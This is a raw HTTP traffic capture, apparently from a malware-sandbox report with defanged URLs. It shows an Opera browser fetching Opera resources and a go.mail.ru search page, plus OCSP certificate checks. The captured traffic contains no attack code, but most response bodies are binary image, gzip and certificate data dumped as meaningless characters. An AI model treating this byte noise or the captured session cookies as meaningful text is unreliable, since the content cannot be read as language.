.$..%..&..'..(..)..*.. ..-.....0..2..3..4..5..7..8..:..;..<..=..>
;..?..@..A..B..C..D..E..F..G..H..I..J..K..M..N..O..P..Q..S..T..U..W..X
..Y..[..]..^.._..`..a..c..d..e..f..h..k..l..m..o..q..r..s..u..v..x..y.
.z..{..}..~...........................................................
......................................................................
..................................................................<<< skipped >>>

GET /previews/images/wikipedia_org_us/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "c4537-5b5e-50ecea1134600"

Content-Type: image/png

Content-Length: 23390

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2598601729 2598587528

Age: 42

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 26
.PNG........IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:4905A1941A226811822A85CA614666AF" xmpMM:DocumentID="xmp.did:53E6
B704BEC511E28F85D5EC1B7B836C" xmpMM:InstanceID="xmp.iid:53E6B703BEC511
E28F85D5EC1B7B836C" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7CFB74550C20681182
2AAABFDFC2DE86" stRef:documentID="xmp.did:4905A1941A226811822A85CA6146
66AF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>.l.<..W.IDATx.....]u.._...).d2..Lz'.D.PB
.........k[t.eW..*.."j..... .B...{/..df............R....f.......~w.. .
...{..../..E......G....]UU.5...(..w.....2)....s%`6|.1.4.k3..O..M...Zt0
......9....O<...(.C''O...O.k...K.....Z.>3....e....*q..7E..@.ew..
.W.q$:..].]l..R.0..A8m.......N.|...k.V.....R.....&...@....%..a.)......
.;..;..q(.t..mT....P..............b.q.}..........3f.z..W`9.t....t.7.8w
nW.._z.9B..A...r.... `..........H..*...JijNl.q-..,. ..Q|.X...qi.k.]/..
`d.d?.....0.....H.p...xS%I.5e.cX.r.r.D.-..AL.tZ.Lo..VV~.?......|..<<< skipped >>>

GET /res/servicefiles/browserjsfiles/json/desktop/browserjs-OPRDesktop-25.0-20150202.js HTTP/1.1

Host: get.geo.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:32:30 GMT

Content-Type: application/x-javascript; charset=utf-8

Content-Length: 12761

Last-Modified: Tue, 03 Feb 2015 10:47:42 GMT

Connection: keep-alive

Accept-Ranges: bytes
// QoEA6sbNbl38cfF5rNdS/zCziJhBPoVBTnN70tB4TD9CmQ qmgYR G1HGc3geAiZXt7
 dQc42Md9M hyyV59Xv09UwQP9P5Vh1npFBq2lsUlEEyDgXYlF4Cupxi1KhoS5sVqHyUkc
gmQzl4y7YUxN14www8JaZdTSrrKB3MY9JmKAh3KMZSP4HoPzyfRucglRLz1n7Rpf9eH/IK
m2oyf7aDinQPm0fnfPhuL6f3KzvX3Wg7luK4H2k7nnPDSNw0XzLHR fxDfa/xrim3W0MCt
LrI lOkfZ0oGfZKetIcClb b3A7M1a6JXE9xy0W3P9K Xp1RYLpSYVFBlgGRZK3Hw==./*
*.** Copyright (C) 2000-2015 Opera Software ASA.  All rights reserved.
.**.** This file is part of the Opera web browser..**.** This script p
atches sites to work better with Opera.** For more information see htt
p://VVV.opera.com/docs/browserjs/.**.** If you have comments on these 
patches (for example if you are the webmaster.** and want to inform us
 about a fixed site that no longer needs patching).** please report is
sues through the bug tracking system.** hXXps://bugs.opera.com/.**.** 
DO NOT EDIT THIS FILE! It will not be used by Opera if edited..**/.// 
Generic fixes (mostly).(function(){..if(location.href.indexOf('operabr
owserjs=no')!=-1) {...return;..}..var bjsversion = " Opera OPRDesktop 
25.0 core 1592.0, February 2, 2015."  ...... " Active patches: 19 ";..
var navRestore = {}; // keep original navigator.* values..var shouldRe
store = false;...var href = location.href;..var pathname = location.pa
thname;..var hostname = {...value: location.hostname,...toString: func
tion() {....return this.value;...},...valueOf: function() {....return 
this.value;...},...indexOf: function(string) {....return this.value.in
dexOf(string);...},...match: function(regex) {....return this.valu<<< skipped >>>

GET /?osd=1 HTTP/1.1

Host: go.mail.ru

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:32 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: sid=51b08bcd977e9f7e512e9b4c0527b7d0; Domain=go.mail.ru; Path=/

Content-Security-Policy: default-src rutube.ru *.mail.ru hXXps://*.mail.ru *.imgsmail.ru *.youtube.com *.youtube.ru *.youtu.be *.googlevideo.com *.ytimg.com hXXps://*.ytimg.com *.rutube.ru *.vimeo.com *.smotri.com *.dailymotion.com *.rambler.ru *.ivi.ru *.digitalaccess.ru *.videomore.ru *.weborama.fr *.adriver.ru *.addthis.com *.yandex.net *.yandex.ru *.newstube.ru newstube.ru *.spruto.tv *.bigmir.net bm.img.com.ua *.tvzavr.ru *.meta.ua *.tvmir.ru tvmir.ru *.mycdn.me ok.ru *.ok.ru odnoklassniki.ru *.odnoklassniki.ru vk.com *.vk.com *.mradx.net 2gis.com *.2gis.com 2gis.ru *.2gis.ru; script-src 'unsafe-inline' 'unsafe-eval' *.mail.ru hXXps://*.mail.ru *.imgsmail.ru hXXps://*.imgsmail.ru ok.ru *.ok.ru *.yandex.ru *.odnoklassniki.ru *.youtube.com *.dailymotion.com *.vimeo.com *.addthis.com *.affiliatesearch.ru affiliatesearch.ru 2gis.com *.2gis.com 2gis.ru *.2gis.ru; img-src *; style-src 'unsafe-inline' *.mail.ru *.imgsmail.ru *.yandex.net *.addthis.com 2gis.com *.2gis.com 2gis.ru *.2gis.ru; font-src data: *.mail.ru *.imgsmail.ru; report-uri hXXp://go.mail.ru/csp-report;

Content-Encoding: gzip
1e3.............S.n.0.}n.....6...I..D"b#U.I......5Kl..[.._.o .....a7.m
x.0K....s...^..6..O...TYx.n9}BnX....g^...;.2...*&8)).....k.s..F..z/F..
.93....e..)..U..J2..g..X. .9.....g.x....;=5./L?.Kzj._................@
zu................8%(....jP.^....n..-....~s ....;WI._.....6.6..f......
._..-?O...|..F........*..~t9.$..E.....#..._..*.(t<{.0p![j..<X.xY
M......BG.....:A..}..T......L.T...6 .vN....hc"9.P). .Y"..F5..z4G..h.'.
=,vp...I..$_v.=y}...#0.@1N..{......V.......O..?.%e. ^..Z?n..^TY}Tf....
......6f0...X]o.T..v~../*..v.j...jbHL.1A..R..I...-.I;u......q...q...Z.
}..../.Kx....v.!.............dZ.%.7..|...g......q~..../....w.E......eU
.]..%4N`.t........!...H...$~..W.......C....n....p....em./`..~/.....`.[
.....5Q"D@...$.H...j..}.........1...|.I.E...|./g@.XU._....K...(..X{.0.
..r:{2{:..>)\...".....6@..KW.=tCO..Nd...>Z.........nJ...|wp.f...
...C:....].q..2...Z.Zq...A..R..X}...C..fA...).D.....D.32Ny..o.'.$,p.j`
50.$0E......M....E6...N....f.{c.}c...;.7.I7.......ZsS... C......2V#&.y
_....X1.R?[..?ri.....\.d..6-.=t. vQ...(..c..Fe...Mp.).7.(TK.....Z.....
....4.u.;.r%! d....2....)F....9DS.e..8.x.X6G.....D.. .n.@..($...%>w
=7._dn....5.....q....N\.j~.88.?.{g.N.1.j.%..X8N...L...l.~G..[.#...)..Q
.W.d.#.......uS...9...N..]M.8.Z'..M\.c.fK..}L.....$...C..()...P.......
...nW.c ....H#..;..|.x.....8.[.....a.8..I(By.bV.....m57....z...L ..8.C
/:.......O..w.....] ...=.%$...%.......n.e[b...d....en..n...R.2i..\.G..
S....<..rMX..k.%[v.....Y.#?...-1..[.o..th..TF!h5.O......T..3k..k.&%
...i.?z~.._..%kd.X..&.xaT..!.j...|..ad-..G.N.(V...X^. ..{..3.bF|..<<< skipped >>>

GET /?osd=1 HTTP/1.1

Host: go.mail.ru

Connection: keep-alive

Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: sid=51b08bcd977e9f7e512e9b4c0527b7d0


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:33 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: sid=c4adf9ad91ebce0fa5ef1d1d850d2a51; Domain=go.mail.ru; Path=/

Content-Security-Policy: default-src rutube.ru *.mail.ru hXXps://*.mail.ru *.imgsmail.ru *.youtube.com *.youtube.ru *.youtu.be *.googlevideo.com *.ytimg.com hXXps://*.ytimg.com *.rutube.ru *.vimeo.com *.smotri.com *.dailymotion.com *.rambler.ru *.ivi.ru *.digitalaccess.ru *.videomore.ru *.weborama.fr *.adriver.ru *.addthis.com *.yandex.net *.yandex.ru *.newstube.ru newstube.ru *.spruto.tv *.bigmir.net bm.img.com.ua *.tvzavr.ru *.meta.ua *.tvmir.ru tvmir.ru *.mycdn.me ok.ru *.ok.ru odnoklassniki.ru *.odnoklassniki.ru vk.com *.vk.com *.mradx.net 2gis.com *.2gis.com 2gis.ru *.2gis.ru; script-src 'unsafe-inline' 'unsafe-eval' *.mail.ru hXXps://*.mail.ru *.imgsmail.ru hXXps://*.imgsmail.ru ok.ru *.ok.ru *.yandex.ru *.odnoklassniki.ru *.youtube.com *.dailymotion.com *.vimeo.com *.addthis.com *.affiliatesearch.ru affiliatesearch.ru 2gis.com *.2gis.com 2gis.ru *.2gis.ru; img-src *; style-src 'unsafe-inline' *.mail.ru *.imgsmail.ru *.yandex.net *.addthis.com 2gis.com *.2gis.com 2gis.ru *.2gis.ru; font-src data: *.mail.ru *.imgsmail.ru; report-uri hXXp://go.mail.ru/csp-report;

Content-Encoding: gzip
667.............W_O.V..v>...UPc....@.(E*Z;.M.M....&...=.&.Q$.n..I..
..i/{.c.@..F.....I.;...)..V-Rn.s.....s....;k....WXK.....,.Y..l...6..h.
....[1cQW2..6..........;1.b....-....29....j...W. j[...k?PA..2...6.....
e-.F..\=<...9........e?.o.s.....[].ZD5.>W....lY.R..Z.........P..
[<.......fM.D*.|%|...........BK|.......r.]....}..-*..O......{..6...
.9.............K....V......z.d-... Y......JE.MH..`....f.I.....4w.6....
luy.S...F.tb..u.......v.i...s..!.:.a..K.%.4L../........E.=Q.......k.~.
.n'oN..{E.V$..y..Hk..AI.c,.%9KN.O...>........#..."7..yhTb......%/./
...c.ir..M^^.B..o....K.N...F:.K^...N............?...]A.w\=..7.~....W#.
....C...1......^O....O.....A./p..S%B.4..3..t..o..u.W.E.]..#......A.l..
.._#.1P .4....P.K.....g.=..P..r.......VJ7..[...R.............]. "..u..
.............3.i.!z...i..S-hng..FA(".G..{.....:.Q....K6l>$..,..!9B.
...u.#K~B..N........n..X.L'.L...%.s..O.q.....gG......L.....y....FT.1D.
e.sU........8...Qo.X....}.r*:....Kui...i...3....Y..x.n.{^.....Rl..4*..
.....Mf0..F~*.w.......>..BR..Fx....x. ..O>&...|T.dm.J^1[8.-.....
|...j.5...H..OU...a ..1z.b....{.x..........p......Tj.:....w..K...L.*..
}.8...DT.mQ0d.mn...*.....v.I.h...f@.L..x, p.}......G.....I5...~..,1S..
.E....P.o..pJFq .e..uJA....X.....7./\...^..AL.W..c....-....~.0.x.D>
.EO.....P.wq|.`P..u..2....'}7....t.2sO.x....u....v..]b..J....4X...y1.[
b...B.g..J.zK...pC..I...Ep.)"..)..:.....k.9....6k.[.Ka ..._b...jK;..."
.Nm..V.p..x...b...b..&'..H..>...3.@._..-k(t,a........B..]._......X.
b..X.a....k.2.]._..L......./~u..Em]G1.........Y.0.....R.JN...C.(..<<< skipped >>>

GET /static/web/img/opera_bookmark/sd_search_img.png HTTP/1.1

Host: go.mail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: sid=c4adf9ad91ebce0fa5ef1d1d850d2a51


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:34 GMT

Content-Type: image/png

Content-Length: 690

Last-Modified: Wed, 18 Feb 2015 14:32:46 GMT

Connection: keep-alive

Expires: Thu, 05 Mar 2015 09:35:34 GMT

Cache-Control: max-age=864000

X-Frame-Options: SAMEORIGIN

Accept-Ranges: bytes
.PNG........IHDR...A...........E;....sRGB.........gAMA......a.....pHYs
..........o.d...GIDATXG..MKTQ....1k&.;cb..>B..]..E.....&......aT...
..b.. BP.i..D.....F#_.6.c....9.Lg:]..v....[.s/._8.... &/...\>.....M
5...n..gt...s.Iv..6n........3.w......w.6....Nr.^..'....~7..?.\.v.3...r
;.o7...;..q..w.MfR....ZG.nFiYH..k.Q...D.....!.......e..>9....]e.:WK
...:..X..B..cbr......D'..,~&tD)0.....f..*....z..(..@=!.....D..:..b2...
.)..:B....t. ..o.../<?tP|"tD)0...-..q.Y....ve.....`........qBG...7L
...MwDDV.[..^...{...Z.[......!.X...y.[@L.wa....yE....?..... .........&
lt;g.....V...Z.....W.....#...Fs...4a?n33....K......X.. ......'...5....
.....^.......%W9......C......;.Iv.....)...@1...C1.H....{..."k.t....IEN
D.B`.....


GET /static/web/img/logotype-go.png HTTP/1.1

Host: go.mail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: sid=c4adf9ad91ebce0fa5ef1d1d850d2a51; hidpi=0


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:34 GMT

Content-Type: image/png

Content-Length: 2047

Last-Modified: Wed, 18 Feb 2015 14:32:46 GMT

Connection: keep-alive

Expires: Thu, 05 Mar 2015 09:35:34 GMT

Cache-Control: max-age=864000

X-Frame-Options: SAMEORIGIN

Accept-Ranges: bytes
.PNG........IHDR.......$.....)@......IDATx....l.U.............@.B. DI.
...E.b.1b..>..YP.... .D$..1Q.]H#..T$(...(&*.*...P.y...........m.m..
.|.9.......9..F..Y.f..5k..Y.f..5k..50...]....@3..k.]...n....*A...|..AF
.>g<~..........`!H.jH=...?..z..>......./XW.-g..V..#..`....`..
...'.lP.N.....b.^IB=..".*&..V..!.V.k&..`$h.s.Tp...#h.B.n....1..p......
W...<.<..........sv.&.X#..[...@k......9.ngP...........<.....#
 ..&.k.....O....l._..0.o....'.;.......X..*@H..bP..F. M.......Bt?1.r.cF
....|V....4..S.Q..g..6.&.o.J.YM.....:...#.d....3.a..-..x....N=....(...
...4.......l.....e.;..jS...5.L.O..{...:..a{E..;.....[X....~.....r.!..:
..E}../.X..o.{!.,.....qz.....`.;.b,...;.........@&.~..8..(;._V..n2h..q
....Y....0.}0.S.....b.....9..3..A.Du.....=`.....s<..zN......D.\o..b
R.......dA.A.,..|.iV.1.....Y.0..|......!........[0...>S....A.9.....
4=6...U,...s....,..*.*..:.#`%..^...E...... .9/l..V.0..#..E...[.>m..
.:.N...%..B...[...[.".3....... ........Nb...M...f...U..~fqyW7..O...@..
...b.. ..&..........2..-.../.{..g...=...$.L.....E.{4.=......c.......U.
..'.K.H.#XL.....-`GPQ..9.^.G.No..uH.q]Nk `.vD]_......Ut.....O@...K....
...<.G.{..o`.....G........^....0=.......L...g94..%.>......%(.bD.
... .c..?4.^C..$.....l..#u .m,~-.Y.....$`....4..|A.W.}..|.........(`&g
t;nx.06.....;"3..ub.............-.6S!R..j..a?.#.......md9\.#..h.qAp.|k
.(.<>.k....R.2.....S..r..S...... .T.A\....^Sm...%*`..hE.@LcA.J.A
.7K'b...'5.~...%Q... .W...(_...g1..I......}...e....F[.3.V.2.Ve..G.5.F.
.1...M{msv....'`.i....h..XY:'`u..%T...%`..c..2.T'].m".>.w..N...<<< skipped >>>

GET /static/web/img/main/ajax_loader_hor.gif HTTP/1.1

Host: go.mail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: sid=c4adf9ad91ebce0fa5ef1d1d850d2a51; hidpi=0; mrcu=E8FE54EAF466748E05E0E7F48AC1; searchuid=2579112161391436322; __atuvc=1|8; __atuvs=54eaf47adf09bb20000; VID=3u5u4k1KJ3nJ00000102141J:


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:35 GMT

Content-Type: image/gif

Content-Length: 10819

Last-Modified: Wed, 18 Feb 2015 14:32:46 GMT

Connection: keep-alive

Expires: Thu, 05 Mar 2015 09:35:35 GMT

Cache-Control: max-age=864000

X-Frame-Options: SAMEORIGIN

Accept-Ranges: bytes
GIF89a...........F....................................................
.......................................!..Created with ajaxload.info.!
.......!..NETSCAPE2.0.....,...........  .di.h..l..p,.tm.x..|....pH....
.r.l:...tJ.Z...v:.......(....z........H....x.h..h|{~.z..x.k.w..u.ys...
..........t`f.^ ]d................dpn..........p......................
.............,..................................;x/!A....{.......N....
F...}\...H....\....:....YE.....r..0...V8w..........<:....G...*T...U
.>......Z.r...jW. ..X.A.-ZpSY.K...vpg..;.n^......w/_....E\8.`.q..&.
Y.]......Y.b..-.E.B-...,.,Jk....;....u...].....,..e...|7...y...\......
.......s_W..t...-.m..........`........~~z...../......v_].x..x.p...f.1.
...v..o.N.Z..bH...I.!..YX.......?.8...Yh...A..o.5U.S.t.a..).cs;.h\.8.x
.TB*Gc...i........L...&.P.......^....a.W&~`JI..bn..Xo^..Wh....`4.....F
..}>.'..N.gj....g...h. .....H:...*..M.......*....j*.]...........*..
..j..'...!.......,...........  .di.h..l..p,.tm.x..|....pH.....r.l:...t
J.Z...v:.......(.6...ap....z.....|<.O...kmyz.|.~...o.....j.w{}s...}
..o...}.x.{....ly....v.....k.p.f.^ ].............gh......h.~.....sg...
..t......s.........t~...........i..p..q...,...0..X..Va....2.(p`.....`.
Hr....@.&.9.$...<.. .eF. =..i.... %.ti....-I....fR.'A....eL.....*U.
J.=.2.{.....6, 9.-.b..a....]..........w..5&.......F..0..y.#0|.m..{...&
lt;a.`.|7?N..s....g....j..(#.,Y._.gW.p.......h...A....'ok..p... _.@...
.. .`.....>J...y.....w.=}....Ko...\...?g<,....! .|..._v.......0.
...XV.....X[.d.]b.^'...j.Z....A.!v !l..sb. ZW../.........6Z....^7\<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEE/s61qLfe5+gLSurb7nO5U= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=545155, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 16:57:49 GMT

Expires: Sun, 1 Mar 2015 16:57:49 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
2165749Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U...O..Z.}.~......;.....20150222165749Z....20150301165749Z0...*.H.....
.........}.8..,..5..VSd......D.../...e....u(...>{Po.|.._y@?.}...kN?
.nC...,A.g......|.Z"......h...n..(.......Y.................O(/g..HL...
.5W..Os.O'.......'.Yi#.......6X.m..I".o.#.K.Jv}....."w.x..6.. .}...*.?
............ ...Cb.....f.z...y.h..R..%.yR.../U.%T..H..1v.....0...0...0
..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U....Geo
Trust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504062359
59Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SSL CA -
 G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._...>
.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6'.e...
..3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8...~WL..
%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M.....=RE.
..Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G...~.2
.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.^.a..)
OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N.4....
RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G..O.1.
...OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>.*&-8
-..<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCECJe6gdYhONI6dBjwD1kE+o= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=474265, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 21:17:36 GMT

Expires: Sat, 28 Feb 2015 21:17:36 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
1211736Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U..."^..X..H..c.=d......20150221211736Z....20150228211736Z0...*.H.....
.........k....?y..G.M.....l..&.......m.....I|....uC.b3.Q..<Ta.{NP.I
R<............z....L.k..Q...q..;Q.`%.I..y.....,JS.-..2.#.....3.....
.].......{<.%.......@..m....d....M..'...z...6.nb.....2{d.-p.G7...?*
u0.......gNu...Q.!.k..Wv ...h.,...*j..1..........b..s....d.Y.n.....0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-..<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEB46A3HdHEXOiQww+nhhjfk= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=340814, public, no-transform, must-revalidate

Last-Modified: Fri, 20 Feb 2015 08:12:19 GMT

Expires: Fri, 27 Feb 2015 08:12:19 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
0081219Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U....:.q..E...0.xa......20150220081219Z....20150227081219Z0...*.H.....
........./Ql[......[d"|...).hW.,5....U.ez.v?R.v&?.r....=..i...'.....V.
h_R.0...|.N.bI.5.b.K.:$K.[B......f.....u$=@.6.GE..J..*C.o!..hD.(<.\
...vC]X.@.r6.B......\.. .,.L..%..p....I.>....).y!...c.K:?....xS7^..
]..# .......2]..U......(...bq..........V>..},^.G................0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-..<<< skipped >>>

